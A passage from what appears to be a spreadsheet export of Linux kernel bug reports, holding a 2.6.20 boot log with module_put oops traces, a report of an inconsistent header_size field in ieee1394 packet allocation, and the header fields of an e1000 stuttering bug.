(reserved) BIOS-e820: 00000000fee00000 - 00000000fee10000 (reserved) BIOS-e820: 00000000ffb00000 - 0000000100000000 (reserved) 1151MB HIGHMEM available. 896MB LOWMEM available. found SMP MP-table at 000fe710 Entering add_active_range(0, 0, 524149) 0 entries of 256 used Zone PFN ranges: DMA 0 -&gt; 4096 Normal 4096 -&gt; 229376 HighMem 229376 -&gt; 524149 early_node_map[1] active PFN ranges 0: 0 -&gt; 524149 On node 0 totalpages: 524149 DMA zone: 32 pages used for memmap DMA zone: 0 pages reserved DMA zone: 4064 pages, LIFO batch:0 Normal zone: 1760 pages used for memmap Normal zone: 223520 pages, LIFO batch:31 HighMem zone: 2302 pages used for memmap HighMem zone: 292471 pages, LIFO batch:31 DMI 2.3 present. ACPI: RSDP (v000 DELL ) @ 0x000febc0 ACPI: RSDT (v001 DELL WS 650 0x00000009 ASL 0x00000061) @ 0x000fd4f1 ACPI: FADT (v001 DELL WS 650 0x00000009 ASL 0x00000061) @ 0x000fd529 ACPI: SSDT (v001 DELL st_ex 0x00001000 MSFT 0x0100000d) @ 0xfffefafa ACPI: MADT (v001 DELL WS 650 0x00000009 ASL 0x00000061) @ 0x000fd59d ACPI: BOOT (v001 DELL WS 650 0x00000009 ASL 0x00000061) @ 0x000fd621 ACPI: ASF! (v016 DELL WS 650 0x00000009 ASL 0x00000061) @ 0x000fd649 ACPI: DSDT (v001 DELL dt_ex 0x00001000 MSFT 0x0100000d) @ 0x00000000 ACPI: PM-Timer IO Port: 0x808 ACPI: Local APIC address 0xfee00000 ACPI: LAPIC (acpi_id[0x01] lapic_id[0x00] enabled) Processor #0 15:2 APIC version 20 ACPI: LAPIC (acpi_id[0x02] lapic_id[0x06] enabled) Processor #6 15:2 APIC version 20 ACPI: LAPIC (acpi_id[0x03] lapic_id[0x01] enabled) Processor #1 15:2 APIC version 20 ACPI: LAPIC (acpi_id[0x04] lapic_id[0x07] enabled) Processor #7 15:2 APIC version 20 ACPI: IOAPIC (id[0x08] address[0xfec00000] gsi_base[0]) IOAPIC[0]: apic_id 8, version 32, address 0xfec00000, GSI 0-23 ACPI: IOAPIC (id[0x09] address[0xfec80000] gsi_base[24]) IOAPIC[1]: apic_id 9, version 32, address 0xfec80000, GSI 24-47 ACPI: IOAPIC (id[0x0a] address[0xfec80800] gsi_base[48]) IOAPIC[2]: apic_id 10, version 32, address 0xfec80800, GSI 48-71 ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl) ACPI: INT_SRC_OVR (bus 0 bus_irq 9 global_irq 9 high level) ACPI: IRQ0 used by override. ACPI: IRQ2 used by override. ACPI: IRQ9 used by override. Enabling APIC mode: Flat. Using 3 I/O APICs Using ACPI (MADT) for SMP configuration information Allocating PCI resources starting at 88000000 (gap: 80000000:7ec00000) Detected 2658.187 MHz processor. Built 1 zonelists. Total pages: 520055 Kernel command line: ro root=LABEL=/ nmi_watchdog=1 elevator=cfq console=ttyS0,115200n8 console=tty0 acpi_pm_good mapped APIC to ffffd000 (fee00000) mapped IOAPIC to ffffc000 (fec00000) mapped IOAPIC to ffffb000 (fec80000) mapped IOAPIC to ffffa000 (fec80800) Enabling fast FPU save and restore... done. Enabling unmasked SIMD FPU exception support... done. Initializing CPU#0 CPU 0 irqstacks, hard=c0345000 soft=c033d000 PID hash table entries: 4096 (order: 12, 16384 bytes) Console: colour VGA+ 80x25 Dentry cache hash table entries: 131072 (order: 7, 524288 bytes) Inode-cache hash table entries: 65536 (order: 6, 262144 bytes) Memory: 2074476k/2096596k available (1483k kernel code, 20844k reserved, 579k data, 192k init, 1179092k highmem) virtual kernel memory layout: fixmap : 0xffedf000 - 0xfffff000 (1152 kB) pkmap : 0xff800000 - 0xffc00000 (4096 kB) vmalloc : 0xf8800000 - 0xff7fe000 ( 111 MB) lowmem : 0xc0000000 - 0xf8000000 ( 896 MB) .init : 0xc0308000 - 0xc0338000 ( 192 kB) .data : 0xc0272f5b - 0xc0303c54 ( 579 kB) .text : 0xc0100000 - 0xc0272f5b (1483 kB) Checking if this processor honours the WP bit even in supervisor mode... Ok. Calibrating delay using timer specific routine.. 5320.40 BogoMIPS (lpj=10640815)Mount-cache hash table entries: 512 CPU: After generic identify, caps: bfebfbff 00000000 00000000 00000000 00004400 00000000 00000000 CPU: Trace cache: 12K uops, L1 D cache: 8K CPU: L2 cache: 512K CPU: Physical Processor ID: 0 CPU: After all inits, caps: bfebfbff 00000000 00000000 00003080 00004400 00000000 00000000 Intel machine check architecture supported. Intel machine check reporting enabled on CPU#0. CPU0: Intel P4/Xeon Extended MCE MSRs (12) available CPU0: Thermal monitoring enabled Checking 'hlt' instruction... OK. Freeing SMP alternatives: 10k freed ACPI: Core revision 20060707 CPU0: Intel(R) Xeon(TM) CPU 2.66GHz stepping 09 Booting processor 1/1 eip 2000 CPU 1 irqstacks, hard=c0346000 soft=c033e000 Initializing CPU#1 Calibrating delay using timer specific routine.. 5316.59 BogoMIPS (lpj=10633189)CPU: After generic identify, caps: bfebfbff 00000000 00000000 00000000 00004400 00000000 00000000 CPU: Trace cache: 12K uops, L1 D cache: 8K CPU: L2 cache: 512K CPU: Physical Processor ID: 0 CPU: After all inits, caps: bfebfbff 00000000 00000000 00003080 00004400 00000000 00000000 Intel machine check architecture supported. Intel machine check reporting enabled on CPU#1. CPU1: Intel P4/Xeon Extended MCE MSRs (12) available CPU1: Thermal monitoring enabled CPU1: Intel(R) Xeon(TM) CPU 2.66GHz stepping 09 Booting processor 2/6 eip 2000 CPU 2 irqstacks, hard=c0347000 soft=c033f000 Initializing CPU#2 Calibrating delay using timer specific routine.. 5316.61 BogoMIPS (lpj=10633234)CPU: After generic identify, caps: bfebfbff 00000000 00000000 00000000 00004400 00000000 00000000 CPU: Trace cache: 12K uops, L1 D cache: 8K CPU: L2 cache: 512K CPU: Physical Processor ID: 3 CPU: After all inits, caps: bfebfbff 00000000 00000000 00003080 00004400 00000000 00000000 Intel machine check architecture supported. Intel machine check reporting enabled on CPU#2. CPU2: Intel P4/Xeon Extended MCE MSRs (12) available CPU2: Thermal monitoring enabled CPU2: Intel(R) Xeon(TM) CPU 2.66GHz stepping 09 Booting processor 3/7 eip 2000 CPU 3 irqstacks, hard=c0348000 soft=c0340000 Initializing CPU#3 Calibrating delay using timer specific routine.. 5316.63 BogoMIPS (lpj=10633277)CPU: After generic identify, caps: bfebfbff 00000000 00000000 00000000 00004400 00000000 00000000 CPU: Trace cache: 12K uops, L1 D cache: 8K CPU: L2 cache: 512K CPU: Physical Processor ID: 3 CPU: After all inits, caps: bfebfbff 00000000 00000000 00003080 00004400 00000000 00000000 Intel machine check architecture supported. Intel machine check reporting enabled on CPU#3. CPU3: Intel P4/Xeon Extended MCE MSRs (12) available CPU3: Thermal monitoring enabled CPU3: Intel(R) Xeon(TM) CPU 2.66GHz stepping 09 Total of 4 processors activated (21270.25 BogoMIPS). ENABLING IO-APIC IRQs ..TIMER: vector=0x31 apic1=0 pin1=2 apic2=-1 pin2=-1 checking TSC synchronization across 4 CPUs: passed. Brought up 4 CPUs migration_cost=108,620 NET: Registered protocol family 16 ACPI: bus type pci registered PCI: PCI BIOS revision 2.10 entry at 0xfbdf2, last bus=5 PCI: Using configuration type 1 Setting up standard PCI resources ACPI: Interpreter enabled ACPI: Using IOAPIC for interrupt routing ACPI: PCI Root Bridge [PCI0] (0000:00) PCI: Probing PCI hardware (bus 00) ACPI: Assume root bridge [\_SB_.PCI0] bus is 0 PCI quirk: region 0800-087f claimed by ICH4 ACPI/GPIO/TCO PCI quirk: region 0880-08bf claimed by ICH4 GPIO Boot video device is 0000:01:00.0 PCI: Transparent bridge - 0000:00:1e.0 ACPI: PCI Interrupt Routing Table [\_SB_.PCI0._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.PCI1._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.PCI1.PCI2._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.PCI1.PCI3._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.PCI4._PRT] ACPI: PCI Interrupt Link [LNKA] (IRQs 3 4 5 6 7 9 10 *11 12 15) ACPI: PCI Interrupt Link [LNKB] (IRQs 3 4 5 6 7 9 10 *11 12 15) ACPI: PCI Interrupt Link [LNKC] (IRQs 3 4 5 6 7 *9 10 11 12 15) ACPI: PCI Interrupt Link [LNKD] (IRQs 3 4 5 6 7 9 *10 11 12 15) ACPI: PCI Interrupt Link [LNKE] (IRQs 3 4 5 6 7 9 10 *11 12 15) ACPI: PCI Interrupt Link [LNKF] (IRQs 3 4 5 6 7 9 10 *11 12 15) ACPI: PCI Interrupt Link [LNKG] (IRQs 3 4 5 6 7 9 10 *11 12 15) ACPI: PCI Interrupt Link [LNKH] (IRQs 3 4 5 6 7 9 10 *11 12 15) Linux Plug and Play Support v0.97 (c) Adam Belay pnp: PnP ACPI init pnp: PnP ACPI: found 13 devices PCI: Using ACPI for IRQ routing PCI: If a device doesn't work, try "pci=routeirq". If it helps, post a report pnp: 00:0c: ioport range 0x800-0x85f could not be reserved pnp: 00:0c: ioport range 0xc00-0xc7f has been reserved pnp: 00:0c: ioport range 0x860-0x8ff could not be reserved PCI: Bridge: 0000:00:01.0 IO window: e000-efff MEM window: ff800000-ff9fffff PREFETCH window: e8000000-f7ffffff PCI: Bridge: 0000:02:1d.0 IO window: d000-dfff MEM window: ff600000-ff7fffff PREFETCH window: disabled. PCI: Bridge: 0000:02:1f.0 IO window: disabled. MEM window: disabled. PREFETCH window: disabled. PCI: Bridge: 0000:00:02.0 IO window: d000-dfff MEM window: ff400000-ff7fffff PREFETCH window: disabled. PCI: Bridge: 0000:00:1e.0 IO window: c000-cfff MEM window: ff200000-ff3fffff PREFETCH window: 88000000-880fffff PCI: Setting latency timer of device 0000:00:1e.0 to 64 NET: Registered protocol family 2 IP route cache hash table entries: 32768 (order: 5, 131072 bytes) TCP established hash table entries: 131072 (order: 8, 1572864 bytes) TCP bind hash table entries: 65536 (order: 7, 786432 bytes) TCP: Hash tables configured (established 131072 bind 65536) TCP reno registered checking if image is initramfs... it is Freeing initrd memory: 897k freed Simple Boot Flag value 0x87 read from CMOS RAM was invalid Simple Boot Flag at 0x7a set to 0x1 Machine check exception polling timer started. highmem bounce pool size: 64 pages VFS: Disk quotas dquot_6.5.1 Dquot-cache hash table entries: 1024 (order 0, 4096 bytes) io scheduler noop registered io scheduler anticipatory registered io scheduler cfq registered (default) Real Time Clock Driver v1.12ac Serial: 8250/16550 driver $Revision: 1.90 $ 4 ports, IRQ sharing enabled serial8250: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A serial8250: ttyS1 at I/O 0x2f8 (irq = 3) is a 16550A 00:09: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A 00:0a: ttyS1 at I/O 0x2f8 (irq = 3) is a 16550A Floppy drive(s): fd0 is 1.44M FDC 0 is a post-1991 82077 RAMDISK driver initialized: 16 RAM disks of 4096K size 1024 blocksize Uniform Multi-Platform E-IDE driver Revision: 7.00alpha2 ide: Assuming 33MHz system bus speed for PIO modes; override with idebus=xx ICH4: IDE controller at PCI slot 0000:00:1f.1 PCI: Enabling device 0000:00:1f.1 (0005 -&gt; 0007) ACPI: PCI Interrupt 0000:00:1f.1[A] -&gt; GSI 18 (level, low) -&gt; IRQ 16 ICH4: chipset revision 1 ICH4: not 100% native mode: will probe irqs later ide0: BM-DMA at 0xffa0-0xffa7, BIOS settings: hda:DMA, hdb:pio ide1: BM-DMA at 0xffa8-0xffaf, BIOS settings: hdc:DMA, hdd:DMA Probing IDE interface ide0... hda: IC35L090AVV207-0, ATA DISK drive ide0 at 0x1f0-0x1f7,0x3f6 on irq 14 Probing IDE interface ide1... hdc: HL-DT-STDVD-ROM GDR8162B, ATAPI CD/DVD-ROM drive hdd: SONY CD-RW CRX216E, ATAPI CD/DVD-ROM drive ide1 at 0x170-0x177,0x376 on irq 15 hda: max request size: 512KiB hda: 156250000 sectors (80000 MB) w/1821KiB Cache, CHS=16383/255/63, UDMA(100) hda: cache flushes supported hda: hda1 hda2 hda3 hda4 &lt; hda5 hda6 hda7 &gt; PNP: PS/2 Controller [PNP0303:KBD,PNP0f13:MOU] at 0x60,0x64 irq 1,12 serio: i8042 KBD port at 0x60,0x64 irq 1 serio: i8042 AUX port at 0x60,0x64 irq 12 mice: PS/2 mouse device common for all mice md: raid1 personality registered for level 1 device-mapper: ioctl: 4.11.0-ioctl (2006-10-12) initialised: dm-devel@xxxxxxxxxxxxxxx: AT Translated Set 2 keyboard as /class/input/input0 TCP cubic registered NET: Registered protocol family 1 Testing NMI watchdog ... OK. Starting balanced_irq Using IPI Shortcut mode Freeing unused kernel memory: 192k freed Time: tsc clocksource has been installed. kjournald starting. Commit interval 5 seconds EXT3-fs: mounted filesystem with ordered data mode. usbcore: registered new interface driver usbfs usbcore: registered new interface driver hub usbcore: registered new device driver usb Linux agpgart interface v0.101 (c) Dave Jones agpgart: Detected an Intel E7505 Chipset. agpgart: AGP aperture is 128M @ 0xe0000000 input: PC Speaker as /class/input/input1 SCSI subsystem initialized EDAC MC: Ver: 2.0.1 Mar 1 2007 Intel(R) PRO/1000 Network Driver - version 7.3.15-k2-NAPI Copyright (c) 1999-2006 Intel Corporation. ACPI: PCI Interrupt 0000:03:0e.0[A] -&gt; GSI 24 (level, low) -&gt; IRQ 17 hdc: ATAPI 48X DVD-ROM drive, 256kB Cache, UDMA(33) Uniform CD-ROM driver Revision: 3.20 hdd: ATAPI 48X CD-ROM CD-R/RW drive, 2048kB Cache, UDMA(33) e1000: 0000:03:0e.0: e1000_probe: (PCI-X:100MHz:64-bit) 00:0d:56:0d:e7:3f e1000: eth0: e1000_probe: Intel(R) PRO/1000 Network Connection ACPI: PCI Interrupt 0000:00:1f.3[B] -&gt; GSI 17 (level, low) -&gt; IRQ 18 libata version 2.00 loaded. input: ImPS/2 Generic Wheel Mouse as /class/input/input2 sata_sil 0000:05:0e.0: version 2.0 ACPI: PCI Interrupt 0000:05:0e.0[A] -&gt; GSI 22 (level, low) -&gt; IRQ 19 ata1: SATA max UDMA/100 cmd 0xF882EC80 ctl 0xF882EC8A bmdma 0xF882EC00 irq 19 ata2: SATA max UDMA/100 cmd 0xF882ECC0 ctl 0xF882ECCA bmdma 0xF882EC08 irq 19 scsi0 : sata_sil USB Universal Host Controller Interface driver v3.0 ACPI: PCI Interrupt 0000:00:1d.0[A] -&gt; GSI 16 (level, low) -&gt; IRQ 20 PCI: Setting latency timer of device 0000:00:1d.0 to 64 uhci_hcd 0000:00:1d.0: UHCI Host Controller uhci_hcd 0000:00:1d.0: new USB bus registered, assigned bus number 1 uhci_hcd 0000:00:1d.0: irq 20, io base 0x0000ff80 usb usb1: configuration #1 chosen from 1 choice hub 1-0:1.0: USB hub found hub 1-0:1.0: 2 ports detected ACPI: PCI Interrupt 0000:00:1d.1[B] -&gt; GSI 19 (level, low) -&gt; IRQ 21 PCI: Setting latency timer of device 0000:00:1d.1 to 64 uhci_hcd 0000:00:1d.1: UHCI Host Controller uhci_hcd 0000:00:1d.1: new USB bus registered, assigned bus number 2 uhci_hcd 0000:00:1d.1: irq 21, io base 0x0000ff60 usb usb2: configuration #1 chosen from 1 choice hub 2-0:1.0: USB hub found hub 2-0:1.0: 2 ports detected ieee1394: Initialized config rom entry `ip1394' ACPI: PCI Interrupt 0000:00:1d.2[C] -&gt; GSI 18 (level, low) -&gt; IRQ 16 PCI: Setting latency timer of device 0000:00:1d.2 to 64 uhci_hcd 0000:00:1d.2: UHCI Host Controller uhci_hcd 0000:00:1d.2: new USB bus registered, assigned bus number 3 uhci_hcd 0000:00:1d.2: irq 16, io base 0x0000ff40 usb usb3: configuration #1 chosen from 1 choice hub 3-0:1.0: USB hub found hub 3-0:1.0: 2 ports detected ata1: SATA link down (SStatus 0 SControl 310) scsi1 : sata_sil usb 1-2: new full speed USB device using uhci_hcd and address 2 usb 1-2: configuration #1 chosen from 1 choice Linux video capture interface: v2.00 ata2: SATA link up 1.5 Gbps (SStatus 113 SControl 310) ata2.00: ATA-7, max UDMA/133, 488397168 sectors: LBA48 NCQ (depth 0/32) ata2.00: ata2: dev 0 multi count 16 pwc: Philips webcam module version 10.0.12 loaded. pwc: Supports Philips PCA645/646, PCVC675/680/690, PCVC720[40]/730/740/750 &amp; PCVC830/840. pwc: Also supports the Askey VC010, various Logitech Quickcams, Samsung MPC-C10 and MPC-C30, pwc: the Creative WebCam 5 &amp; Pro Ex, SOTEC Afina Eye and Visionite VCS-UC300 and VCS-UM100. ata2.00: configured for UDMA/100 scsi 1:0:0:0: Direct-Access ATA HDT722525DLA380 V44O PQ: 0 ANSI: 5 ACPI: PCI Interrupt 0000:05:0d.0[A] -&gt; GSI 21 (level, low) -&gt; IRQ 22 ACPI: PCI Interrupt 0000:00:1d.7[D] -&gt; GSI 23 (level, low) -&gt; IRQ 23 PCI: Setting latency timer of device 0000:00:1d.7 to 64 ehci_hcd 0000:00:1d.7: EHCI Host Controller ehci_hcd 0000:00:1d.7: new USB bus registered, assigned bus number 4 ehci_hcd 0000:00:1d.7: debug port 1 PCI: cache line size of 128 is not supported by device 0000:00:1d.7 ehci_hcd 0000:00:1d.7: irq 23, io mem 0xffa20000 ehci_hcd 0000:00:1d.7: USB 2.0 started, EHCI 1.00, driver 10 Dec 2004 usb usb4: configuration #1 chosen from 1 choice hub 4-0:1.0: USB hub found hub 4-0:1.0: 6 ports detected Installing spdif_bug patch: Audigy 2 ZS [SB0353] pwc: Logitech QuickCam Zoom (new model) USB webcam detected. pwc: Registered as /dev/video0. usbcore: registered new interface driver Philips webcam usbcore: registered new interface driver snd-usb-audio usb 1-2: USB disconnect, address 2 ACPI: PCI Interrupt 0000:05:0c.0[A] -&gt; GSI 20 (level, low) -&gt; IRQ 24 scsi 1:0:0:0: Attached scsi generic sg0 type 0 ohci1394: fw-host0: OHCI-1394 1.1 (PCI): IRQ=[24] MMIO=[ff2ff800-ff2fffff] Max Packet=[2048] IR/IT contexts=[4/8] ACPI: PCI Interrupt 0000:05:0d.2[B] -&gt; GSI 22 (level, low) -&gt; IRQ 19 ohci1394: fw-host1: OHCI-1394 1.1 (PCI): IRQ=[19] MMIO=[ff2ff000-ff2ff7ff] Max Packet=[2048] IR/IT contexts=[4/8] SCSI device sda: 488397168 512-byte hdwr sectors (250059 MB) sda: Write Protect is off sda: Mode Sense: 00 3a 00 00 SCSI device sda: write cache: enabled, read cache: enabled, doesn't support DPO or FUA SCSI device sda: 488397168 512-byte hdwr sectors (250059 MB) sda: Write Protect is off sda: Mode Sense: 00 3a 00 00 SCSI device sda: write cache: enabled, read cache: enabled, doesn't support DPO or FUA sda: sda1 sda2 sda3 sd 1:0:0:0: Attached scsi disk sda Non-volatile memory driver v1.2 usb 1-2: new full speed USB device using uhci_hcd and address 3 parport: PnPBIOS parport detected. parport0: PC-style at 0x378 (0x778), irq 7, dma 1 [PCSPP,TRISTATE,COMPAT,ECP,DMA] lp0: using parport0 (interrupt-driven). usb 1-2: configuration #1 chosen from 1 choice input: Power Button (FF) as /class/input/input3 ACPI: Power Button (FF) [PWRF] input: Power Button (CM) as /class/input/input4 ACPI: Power Button (CM) [VBTN] pwc: Logitech QuickCam Zoom (new model) USB webcam detected. pwc: Registered as /dev/video0. md: Autodetecting RAID arrays. md: autorun ... md: ... autorun DONE. ieee1394: Host added: ID:BUS[0-00:1023] GUID[87ffffffffffff00] eth1394: eth1: IEEE-1394 IPv4 over 1394 Ethernet (fw-host0) eth1394: eth2: IEEE-1394 IPv4 over 1394 Ethernet (fw-host1) ieee1394: The root node is not cycle master capable; selecting a new root node and resetting... BUG: unable to handle kernel paging request at virtual address 6b6b6e6b printing eip: c0130113 *pde = 00000000 Oops: 0002 [#1] PREEMPT SMP last sysfs file: /class/usb_endpoint/usbdev1.3_ep82/dev Modules linked in: eth1394 video thermal processor fan button ac lp parport_pc parport nvram sd_mod snd_emu10k1_synth sg snd_emux_synth snd_seq_virmidi snd_seq_midi_emul pwc compat_ioctl32 videodev v4l2_common v4l1_compat snd_usb_audio snd_usb_lib snd_emu10k1 snd_rawmidi snd_ac97_codec ac97_bus snd_seq_dummy snd_seq_oss snd_seq_midi_event snd_seq ohci1394 ieee1394 snd_pcm_oss snd_mixer_oss ehci_hcd uhci_hcd sata_sil snd_pcm libata snd_seq_device snd_timer serio_raw snd_page_alloc snd_util_mem ide_cd psmouse i2c_i801 e7xxx_edac snd_hwdep e1000 edac_mc snd soundcore scsi_mod pcspkr i2c_core intel_agp cdrom agpgart usbcore ext3 jbd CPU: 3 EIP: 0060:[&lt;c0130113&gt;] Not tainted VLI EFLAGS: 00010202 (2.6.20.1 #3) EIP is at module_put+0x20/0x52 eax: 6b6b6e6b ebx: 6b6b6b6b ecx: 00000001 edx: f7f94000 esi: f79e79bc edi: 6b6b6b6b ebp: f7a4e8fc esp: f7f94f58 ds: 007b es: 007b ss: 0068 Process udevd (pid: 1908, ti=f7f94000 task=f7fd5560 task.ti=f7f94000) Stack: c21bfcc8 c0183a5b 00000010 f7fa9120 f7a47048 c0151253 00000000 00000000 f7ff2208 f7fa9120 f7fdc048 00000000 f7fa9120 c014ed90 00000003 00000003 f7fdc048 f7fdc0c8 c014fd89 00000003 00000006 00000003 f7f94000 c0102bce Call Trace: [&lt;c0183a5b&gt;] sysfs_release+0x2d/0x4c [&lt;c0151253&gt;] __fput+0x96/0x13c [&lt;c014ed90&gt;] filp_close+0x51/0x58 [&lt;c014fd89&gt;] sys_close+0x70/0xa7 [&lt;c0102bce&gt;] sysenter_past_esp+0x5f/0x85 [&lt;c0270033&gt;] __sched_text_start+0x6b3/0x965 ======================= Code: 00 89 f0 83 c4 0c 5b 5e 5f 5d c3 53 89 c3 85 c0 74 49 b8 01 00 00 00 e8 5f 49 fe ff e8 3b 5b 07 00 c1 e0 07 8d 84 18 80 01 00 00 &lt;ff&gt; 08 83 3b 02 75 0b 8b 83 88 05 00 00 e8 a9 45 fe ff b8 01 00 EIP: [&lt;c0130113&gt;] module_put+0x20/0x52 SS:ESP 0068:f7f94f58 &lt;6&gt;note: udevd[1908] exited with preempt_count 1 BUG: scheduling while atomic: udevd/0x10000001/1908 [&lt;c026f9d6&gt;] __sched_text_start+0x56/0x965 [&lt;c011cc72&gt;] irq_exit+0x37/0x42 [&lt;c010d1d7&gt;] smp_apic_timer_interrupt+0x70/0x79 [&lt;c010369c&gt;] apic_timer_interrupt+0x28/0x30 [&lt;c0114b01&gt;] __cond_resched+0x12/0x2c [&lt;c02708e9&gt;] cond_resched+0x26/0x31 [&lt;c01404d2&gt;] unmap_vmas+0x3d3/0x4df [&lt;c0142cf5&gt;] exit_mmap+0x7e/0x10a [&lt;c0116bd7&gt;] mmput+0x1d/0x78 [&lt;c011b322&gt;] do_exit+0x1b2/0x6d8 [&lt;c011007b&gt;] sys_vm86+0x99/0x21d [&lt;c01040fc&gt;] die+0x1f7/0x21c [&lt;c011180e&gt;] do_page_fault+0x442/0x510 [&lt;c01113cc&gt;] do_page_fault+0x0/0x510 [&lt;c027230c&gt;] error_code+0x7c/0x84 [&lt;c0130113&gt;] module_put+0x20/0x52 [&lt;c0183a5b&gt;] sysfs_release+0x2d/0x4c [&lt;c0151253&gt;] __fput+0x96/0x13c [&lt;c014ed90&gt;] filp_close+0x51/0x58 [&lt;c014fd89&gt;] sys_close+0x70/0xa7 [&lt;c0102bce&gt;] sysenter_past_esp+0x5f/0x85 [&lt;c0270033&gt;] __sched_text_start+0x6b3/0x965 ======================= ieee1394: Node added: ID:BUS[1-00:1023] GUID[0050c500001076df] ieee1394: Host added: ID:BUS[1-01:1023] GUID[00023c00a1037111] ieee1394: raw1394: /dev/raw1394 device initialized video1394: Installed video1394 module EXT3 FS on hda2, internal journal kjournald starting. Commit interval 5 seconds EXT3 FS on hda1, internal journal EXT3-fs: mounted filesystem with ordered data mode. kjournald starting. Commit interval 5 seconds EXT3 FS on hda5, internal journal EXT3-fs: mounted filesystem with ordered data mode. kjournald starting. Commit interval 5 seconds EXT3 FS on dm-0, internal journal EXT3-fs: mounted filesystem with ordered data mode. kjournald starting. Commit interval 5 seconds EXT3 FS on hda3, internal journal EXT3-fs: mounted filesystem with ordered data mode. kjournald starting. Commit interval 5 seconds EXT3 FS on dm-1, internal journal EXT3-fs: mounted filesystem with ordered data mode. Adding 2040212k swap on /dev/hda7. Priority:-1 extents:1 across:2040212k IA-32 Microcode Update Driver: v1.14a &lt;tigran@xxxxxxxxxxxxxxxxxxxx&gt; NET: Registered protocol family 17 e1000: eth0: e1000_watchdog: NIC Link is Up 100 Mbps Full Duplex NET: Registered protocol family 10 lo: Disabled Privacy Extensions Mobile IPv6 Installing knfsd (copyright (C) 1996 okir@xxxxxxxxxxxx). NFSD: Using /var/lib/nfs/v4recovery as the NFSv4 state recovery directory NFSD: starting 90-second grace period p4-clockmod: P4/Xeon(TM) CPU On-Demand Clock Modulation available Time: acpi_pm clocksource has been installed. usbcore: deregistering interface driver Philips webcam pwc: Philips webcam module removed. pwc: Philips webcam module version 10.0.12 loaded. pwc: Supports Philips PCA645/646, PCVC675/680/690, PCVC720[40]/730/740/750 &amp; PCVC830/840. pwc: Also supports the Askey VC010, various Logitech Quickcams, Samsung MPC-C10 and MPC-C30, pwc: the Creative WebCam 5 &amp; Pro Ex, SOTEC Afina Eye and Visionite VCS-UC300 and VCS-UM100. pwc: Logitech QuickCam Zoom (new model) USB webcam detected. pwc: Registered as /dev/video0. usbcore: registered new interface driver Philips webcam [drm] Initialized drm 1.1.0 20060810 ACPI: PCI Interrupt 0000:01:00.0[A] -&gt; GSI 16 (level, low) -&gt; IRQ 20 [drm] Initialized radeon 1.25.0 20060524 on minor 0 agpgart: Found an AGP 3.0 compliant device at 0000:00:00.0. agpgart: Putting AGP V3 device at 0000:00:00.0 into 8x mode agpgart: Putting AGP V3 device at 0000:01:00.0 into 8x mode [drm] Setting GART location based on new memory map [drm] Loading R200 Microcode [drm] writeback test succeeded in 1 usecs BUG: unable to handle kernel paging request at virtual address 6b6b6d6b printing eip: c01300ff *pde = 00000000 Oops: 0002 [#1] PREEMPT SMP Modules linked in: radeon drm pwc eeprom cpufreq_ondemand p4_clockmod speedstep_lib nfsd exportfs ipv6 autofs4 nfs lockd sunrpc af_packet firmware_class binfmt_misc video thermal processor fan button ac lp parport_pc parport nvram video1394 raw1394 eth1394 snd_usb_audio compat_ioctl32 videodev v4l2_common snd_usb_lib v4l1_compat sd_mod sg snd_emu10k1_synth snd_emux_synth snd_seq_virmidi snd_seq_midi_emul snd_emu10k1 snd_rawmidi snd_ac97_codec ac97_bus snd_seq_dummy ohci1394 snd_seq_oss snd_seq_midi_event ieee1394 snd_seq ehci_hcd sata_sil snd_pcm_oss snd_mixer_oss libata snd_pcm uhci_hcd e1000 serio_raw scsi_mod snd_seq_device snd_timer snd_page_alloc snd_util_mem snd_hwdep pcspkr psmouse snd soundcore e7xxx_edac edac_mc ide_cd cdrom i2c_i801 i2c_core intel_agp agpgart usbcore ext3 jbd CPU: 1 EIP: 0060:[&lt;c01300ff&gt;] Not tainted VLI EFLAGS: 00010202 (2.6.20.2 #1) EIP is at module_put+0x20/0x52 eax: 6b6b6d6b ebx: 6b6b6b6b ecx: 00000001 edx: e7a01000 esi: edb7e4e4 edi: 6b6b6b6b ebp: e79fd50c esp: e7a01f58 ds: 007b es: 007b ss: 0068 Process udevd (pid: 9656, ti=e7a01000 task=f7a46030 task.ti=e7a01000) Stack: eba628a0 c0183a1e 00000010 ed570870 e7a641d0 c0151263 00000000 00000000 f7ff2208 ed570870 f745b678 00000000 ed570870 c014eda0 00000003 00000003 f745b678 f745b6f8 c014fd99 00000003 00000007 00000003 e7a01000 c0102bde Call Trace: [&lt;c0183a1e&gt;] sysfs_release+0x2d/0x4c [&lt;c0151263&gt;] __fput+0x96/0x13c [&lt;c014eda0&gt;] filp_close+0x51/0x58 [&lt;c014fd99&gt;] sys_close+0x70/0xa7 [&lt;c0102bde&gt;] sysenter_past_esp+0x5f/0x85 [&lt;c0270033&gt;] __sched_text_start+0x613/0x971 ======================= C</t>
  </si>
  <si>
    <t>packet-&gt;header_size is not consistent with packet-&gt;header?</t>
  </si>
  <si>
    <t>2007-03-15 23:52 UTC</t>
  </si>
  <si>
    <t>2007-05-02 07:11 UTC</t>
  </si>
  <si>
    <t>Distribution: kernel Problem Description: When I'm inspecting ieee1394 source code, I found that in struct hpsb_packet, field header is the header of the packet, and header_size is the size of the header. They should always keep consistent. However, I found one place where they are not updated consistently: drivers/ieee1394/ieee1394_core.c:149 struct hpsb_packet *hpsb_alloc_packet(size_t data_size) { struct hpsb_packet *packet = NULL; skb = alloc_skb(data_size + sizeof(*packet), GFP_ATOMIC); memset(skb-&gt;data, 0, data_size + sizeof(*packet)); packet = (struct hpsb_packet *)skb-&gt;data; packet-&gt;skb = skb; packet-&gt;header = packet-&gt;embedded_header; packet-&gt;state = hpsb_unused; packet-&gt;generation = -1; } in the piece of code, skb-&gt;data is first memset to zero, and then packet points to it, so now all the fields in packet are zero. Then packet-&gt;header got a valid value, but packet-&gt;header_size isn't updated together. This might cause serious consistency problems. Steps to reproduce: I found this suspicious spot with the help of a code-checking tool.</t>
  </si>
  <si>
    <t>2.6.21-rc5</t>
  </si>
  <si>
    <t>e1000 driver causes system to stutter - freeze for ~0.2 secs every 2.5 secs</t>
  </si>
  <si>
    <t>&gt;=2.6.18</t>
  </si>
  <si>
    <t>2007-03-17 18:18 UTC</t>
  </si>
  <si>
    <t>Eric Paynter</t>
  </si>
  <si>
    <t>2007-07-15 03:18 UTC</t>
  </si>
  <si>
